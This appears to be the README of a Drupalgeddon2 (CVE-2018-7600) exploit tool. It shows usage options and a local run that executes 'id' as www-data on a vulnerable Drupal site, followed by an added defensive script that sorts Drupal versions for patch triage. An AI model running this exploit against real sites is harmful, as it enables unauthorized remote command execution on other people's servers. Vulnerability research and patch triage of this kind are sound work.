rafaelcaria/drupalgeddon2-CVE-2018-7600

Drupal - Drupalgeddon2 (CVE-2018-7600)

$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]

[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

optional arguments:
  -h, --help                        show this help message and exit
  --url URL, -u URL                 URL of target Drupal site (ex: http://target.com/)
  --command COMMAND, -c COMMAND     OS Command to execute
  --function FUNCTION, -f FUNCTION  Function to use as attack vector (default = passthru)
  --test                            Test if target is vulnerable
  --proxy PROXY, -p PROXY           Configure a proxy in the format http://127.0.0.1:8080/ (default = none)

$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Sending request to: http://127.0.0.1
[+] Testing if: http://127.0.0.1 is vulnerable
[!] Target is vulnerable to CVE-2018-7600
[+] Triggering exploit to execute: id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
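
The affected-version list in the help text above can be turned into an inventory check for patch triage. The following is an added example, not part of this repository: it classifies Drupal version strings against exactly the ranges the help text lists. The function names and the sample inventory are constructed for illustration, and branches the help text does not mention are reported as "unlisted" rather than guessed.

```python
import re

# Branch -> first fixed release per the help text; None = whole branch listed.
AFFECTED_BRANCHES = {
    (6,): None, (7,): (7, 58),
    (8, 2): None, (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6), (8, 5): (8, 5, 1),
}
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?")

def parse_version(text):
    """Return the leading numeric part of a version string as a tuple."""
    match = _VERSION_RE.match(text)
    if not match:
        raise ValueError(f"unrecognised Drupal version: {text!r}")
    return tuple(int(part) for part in match.groups() if part is not None)

def classify(version_text):
    """Return 'affected', 'fixed' or 'unlisted' for one version string."""
    version = parse_version(version_text)
    for branch, first_fixed in AFFECTED_BRANCHES.items():
        if version[:len(branch)] == branch:
            if first_fixed is None or version < first_fixed:
                return "affected"
            return "fixed"
    return "unlisted"  # branch not mentioned in the help text

def triage(inventory):
    """Group hosts by classification; unparsable versions go to 'unknown'."""
    report = {"affected": [], "fixed": [], "unlisted": [], "unknown": []}
    for host, version_text in sorted(inventory.items()):
        try:
            report[classify(version_text)].append(host)
        except ValueError:
            report["unknown"].append(host)
    return report

# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "cms-a.example.internal": "7.57",
    "cms-b.example.internal": "8.5.0-rc1",
    "cms-c.example.internal": "8.4.6",
    "cms-d.example.internal": "7.x-dev",
    "cms-e.example.internal": "8.1.10",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:9} {', '.join(hosts) or '-'}")
```

Pre-release suffixes such as `-rc1` are ignored, so a release candidate is compared by its numeric version; hosts reported as "unknown" or "unlisted" need a manual check.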
